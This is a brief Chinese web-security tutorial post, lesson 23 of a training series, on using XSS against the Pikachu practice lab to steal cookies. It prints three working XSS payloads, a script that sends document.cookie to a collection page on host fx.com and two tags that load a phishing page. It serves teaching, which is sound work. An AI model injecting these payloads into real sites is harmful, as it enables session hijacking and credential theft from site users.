风炫安全WEB安全学习第二十三节课利用XSS获取COOKIE

2021-01-09 本文已影响0人风炫安全

风炫安全WEB安全学习第二十三节课利用XSS获取COOKIE

XSS如何利用

获取COOKIE

我们使用pikachu写的pkxss后台

使用方法：

<script>document.location='http://fx.com/pikachu/pkxss/xcookie/cookie.php?cookie='+document.cookie;</script>

<img src="http://fx.com/pikachu/pkxss/xfish/xfish.php" />

<script src="http://fx.com/pikachu/pkxss/xfish/xfish.php"></script>

参考：
http://blog.evalshell.com/2020/12/20/%e9%a3%8e%e7%82%ab%e5%ae%89%e5%85%a8web%e5%ae%89%e5%85%a8%e5%ad%a6%e4%b9%a0%e7%ac%ac%e4%ba%8c%e5%8d%81%e4%b8%89%e8%8a%82%e8%af%be-%e5%88%a9%e7%94%a8xss%e8%8e%b7%e5%8f%96cookie/

上一篇下一篇

猜你喜欢

热点阅读